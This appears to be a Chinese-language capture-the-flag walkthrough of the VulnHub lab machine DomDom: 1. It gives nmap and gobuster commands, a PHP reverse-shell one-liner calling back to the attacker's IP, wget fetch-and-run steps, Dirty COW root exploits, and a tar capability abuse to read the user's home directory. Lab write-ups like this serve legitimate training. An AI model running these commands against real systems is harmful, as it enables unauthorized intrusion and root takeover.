介绍信息收集
主机发现主机信息探测 测试网站命令执行-反弹shell脏牛提权
方式1方式2 其他提权方式参考 介绍
系列:DomDom(此系列仅此一台)
发布日期:2019年7月11日
难度:初级
Flag : 未知
学习:命令执行、脏牛提权
靶机地址:https://www.vulnhub.com/entry/domdom-1,328/
nmap -sn 192.168.40.0/24
主机信息探测 信息探测:nmap -A -p- 192.168.40.152,只开放了80等端口。
打开网站,如下图
没啥有价值的信息,先目录扫描走一波呢?
从靶机的描述页面中得知网站是php的,因此着重测试php
gobuster dir -u http://192.168.40.152 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 -x php
直接访问网站根目录,并填写所有的内容框,点击“Execute”按钮后会跳转到index.php直接访问/admin.php得到如下图的暗语 测试修改请求地址 直接访问网站根目录,抓包得到(已经自动跳转到index.php)
修改index.php为admin.php,得到线索,要添加cmd
上文得知网站存在命令执行,靶场又是php的,就使用php反弹shell
kali开启监听:nc -nvlp 1234命令执行:php -r '$sock=fsockopen("192.168.40.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
注意:命令执行的内容需要做编码,使用Ctrl+U快捷键
得知靶机上存在python3,获取交互式shell(如果后期使用wget下载文件失败,请退出交互式shell),通过passwd文件得知靶机上存在domom用户
先去domom用户的家目录溜达溜达,发现了一个文件,但是不让我看。
下载提权脚本:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
kali开启web服务:python3 -m http.server 80靶机下载文件,并运行:wget http://192.168.40.129/linux-exploit-suggester.shchmod +x linux-exploit-suggester.sh./linux-exploit-suggester.sh
看到了脏牛漏洞
wget http://192.168.40.129/CVE-2016-5195-master.zipunzip CVE-2016-5195-master.zipcd CVE-2016-5195-mastermake./dcow -s
方式2 kali下载exp,并开放web服务wget https://www.exploit-db.com/download/40616mv 40616 cowroot.cpython3 -m http.server 80
靶机下载文件,编译并运行wget http://192.168.40.129/cowroot.cgcc cowroot.c -o cowroot -pthreadchmod +x cowroot./cowroot
其他提权方式 在之前的靶机:ConNECT THE DOTS: 1 中,介绍过使用 /sbin/getcap -r / 2>/dev/null 查找设备上特殊权限的文件,这里可以试一试。然后就发现了 tar ,嘿嘿,可以把 ConNECT THE DOTS: 1 中的提权方法抄过来
tar -cvf domom.tar /home/domomtar -xvf domom.tar
打包 /home/domom,之后对其解压,经过搜寻,发现了root的密码,提权成功。
linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out